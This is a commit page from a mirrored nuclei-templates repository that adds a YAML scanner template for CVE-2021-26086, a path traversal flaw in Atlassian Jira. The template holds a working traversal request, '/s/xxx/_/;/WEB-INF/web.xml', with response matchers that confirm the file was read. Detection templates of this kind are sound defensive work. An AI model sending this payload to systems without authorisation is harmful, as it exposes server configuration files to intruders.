daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2021-26086.yaml

patch-1
Bùi Đại Gia 2021-08-26 10:45:56 +07:00 committed by GitHub
parent 03b8678ea1
commit 7a468632dc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
cves/2021/CVE-2021-26086.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2021-26086
info:
name: Jira Limited Remote File Read
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
reference: |
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
tags: cve,cve2021,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "JiraImportProgressFilter"
part: body